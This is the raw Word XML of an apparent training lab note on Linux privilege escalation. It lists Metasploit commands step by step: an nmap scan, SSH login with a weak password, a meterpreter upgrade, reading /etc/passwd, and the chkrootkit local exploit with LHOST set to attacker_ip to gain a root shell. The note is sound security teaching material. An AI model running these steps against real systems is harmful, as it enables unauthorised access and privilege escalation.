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D5B74" w14:textId="572E3FA5" w:rsidR="008953A9" w:rsidRPr="008953A9" w:rsidRDefault="008953A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008953A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Privilege Escalation Exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="008953A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="008953A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerable Program</w:t>
      </w:r>
      <w:r w:rsidRPr="008953A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD34BC" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="41D000BE" w14:textId="6DE4A643" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r w:rsidRPr="008953A9">
        <w:t xml:space="preserve">Privilege Escalation </w:t>
      </w:r>
      <w:r>
        <w:t>technique depends upon the Linux kernel as well as distribution release version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645FB25A" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="65E75910" w14:textId="191D3F98" w:rsidR="008953A9" w:rsidRPr="008953A9" w:rsidRDefault="008953A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008953A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC17B1" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="42BB089D" w14:textId="6DDBC2D9" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="201DD540" w14:textId="52977616" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4954B6" w14:textId="2E2A8643" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C84F3" w14:textId="16FB2400" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23DA706E" w14:textId="72C629BC" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="166CADC4" w14:textId="4DD976BB" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40F61B39" w14:textId="7FB4E285" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="440BED83" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="58C99761" w14:textId="35A6C09A" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D951D" w14:textId="2FC1DC54" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A947801" w14:textId="126C1C99" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve">Set USERNAME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jackie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D8AD72E" w14:textId="0D19E9B7" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve">Set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39105BF2" w14:textId="3E818999" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B33F1" w14:textId="16E32A6E" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> us with the command shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D22C2" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="7ED69C2B" w14:textId="7D34031B" w:rsidR="008953A9" w:rsidRDefault="008953A9">
      <w:r>
        <w:t>Session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68000840" w14:textId="77777777" w:rsidR="008953A9" w:rsidRDefault="008953A9"/>
    <w:p w14:paraId="1026A635" w14:textId="4CE4044E" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EF71BB9" w14:textId="4E8353A9" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29756E6D" w14:textId="527CE8AA" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="396D14DC" w14:textId="44AE6E8A" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t xml:space="preserve">Cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618F0B1" w14:textId="47F4154D" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t># distro release version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59D381" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="6F582BCD" w14:textId="250626FC" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394FED1" w14:textId="561937EA" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>#Kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CCBF5" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="18A6FC08" w14:textId="319A57E5" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C3036" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="0C7B0B2C" w14:textId="41066743" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Sessions -u id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBC593" w14:textId="2DC3AC91" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t xml:space="preserve"># upgrade session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metepreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10359BF4" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="3E49FAEF" w14:textId="65171CDB" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t xml:space="preserve">Sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B05E9" w14:textId="15AC3AA0" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C105305" w14:textId="4DC2B21A" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="09529EB7" w14:textId="6BADE269" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D92458" w14:textId="1A2C0B99" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E26F04B" w14:textId="5C52D690" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD97C7" w14:textId="1D209231" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="480700CB" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="20F12223" w14:textId="3F1F0453" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2350446D" w14:textId="3B4B33AB" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the users on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07F9E0" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="4AA073E6" w14:textId="573E8981" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t>Ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB76B65" w14:textId="244AE1F1" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>program</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="59B1579D" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="60DFB267" w14:textId="38D6A07E" w:rsidR="00565D11" w:rsidRDefault="000D63C8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1BC6D" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="2055E49B" w14:textId="7BA817E2" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0ECFD" w14:textId="7BDB0A51" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="1779DE65" w14:textId="59DC8803" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>#Terminate channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F0340" w14:textId="01952C11" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t xml:space="preserve">Background </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726A185" w14:textId="2629F0D1" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D07189E" w14:textId="44012039" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A1B8B31" w14:textId="06837403" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Use(local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B588C78" w14:textId="12DD38FA" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DB40AB" w14:textId="0ABD15AF" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5999B" w14:textId="0412BDC2" w:rsidR="00FC6F9C" w:rsidRDefault="00FC6F9C">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7520D251" w14:textId="073155A8" w:rsidR="00FC6F9C" w:rsidRDefault="00FC6F9C">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74203A52" w14:textId="623DF371" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B10025" w14:textId="77777777" w:rsidR="00FC6F9C" w:rsidRDefault="00FC6F9C"/>
    <w:p w14:paraId="285EC5D4" w14:textId="0143CCFA" w:rsidR="00180DAC" w:rsidRDefault="00180DAC">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22B1C5" w14:textId="77777777" w:rsidR="00180DAC" w:rsidRDefault="00180DAC"/>
    <w:p w14:paraId="5B9B2086" w14:textId="146AF52C" w:rsidR="00180DAC" w:rsidRDefault="00180DAC">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1896D71C" w14:textId="2DEC7394" w:rsidR="00180DAC" w:rsidRDefault="00180DAC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4933CC13" w14:textId="77777777" w:rsidR="00180DAC" w:rsidRDefault="00180DAC"/>
    <w:p w14:paraId="715FEE05" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="23B97F0E" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="677C1C12" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="6D923977" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="44FE67EF" w14:textId="77777777" w:rsidR="000D63C8" w:rsidRDefault="000D63C8"/>
    <w:p w14:paraId="76E6F6E6" w14:textId="77777777" w:rsidR="00565D11" w:rsidRDefault="00565D11"/>
    <w:p w14:paraId="372C9B79" w14:textId="6256473B" w:rsidR="00565D11" w:rsidRPr="00565D11" w:rsidRDefault="00565D11">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C251292" w14:textId="2823EB2C" w:rsidR="00565D11" w:rsidRDefault="00565D11">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is used to scan the Linux system for rootkit it is anti-rootkit program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA67E9" w14:textId="60C5ED3D" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:t>Only affect Version older them 0.50</w:t>
      </w:r>
      <w:r w:rsidR="009642B2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA7EFD" w14:textId="6C5686E5" w:rsidR="000D63C8" w:rsidRDefault="000D63C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E81F38E" wp14:editId="1176BE40">
            <wp:extent cx="5569813" cy="731520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203950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07651" name="Picture 203950765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620" cy="74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AE332" w14:textId="77777777" w:rsidR="00244C8B" w:rsidRDefault="00244C8B"/>
    <w:p w14:paraId="138098DF" w14:textId="79E95632" w:rsidR="00244C8B" w:rsidRDefault="00244C8B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244C8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244C8B">
        <w:t xml:space="preserve"> is a lightweight open-source </w:t>
      </w:r>
      <w:r w:rsidRPr="00244C8B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>host-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00244C8B">
        <w:t xml:space="preserve"> scanner that looks for signs of common Linux rootkits, backdoors and local compromises. It runs a set of heuristic checks (inspecting /proc, binaries, kernel modules, network sockets, etc.) and prints suspicious findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC78D6F" w14:textId="1631A339" w:rsidR="00244C8B" w:rsidRDefault="00244C8B">
      <w:r w:rsidRPr="00244C8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00244C8B">
        <w:t xml:space="preserve"> — a malicious tool or program designed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00244C8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hide the attacker’s presence</w:t>
      </w:r>
      <w:r w:rsidRPr="00244C8B">
        <w:t xml:space="preserve"> on a system by modifying system files, processes, or kernel functions.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00244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48F"/>
    <w:rsid w:val="000D63C8"/>
    <w:rsid w:val="00180DAC"/>
    <w:rsid w:val="00244C8B"/>
    <w:rsid w:val="00371F1B"/>
    <w:rsid w:val="00394E70"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00565D11"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00644F2B"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008953A9"/>
    <w:rsid w:val="009642B2"/>
    <w:rsid w:val="00A00D3D"/>
    <w:rsid w:val="00A4048F"/>
    <w:rsid w:val="00FC6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B24D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A5AD9AB9-59D6-4BB4-983A-666A13FF0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4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4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4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4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4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4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4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4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4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4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4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181</Words>
  <Characters>1372</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>52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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T07:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>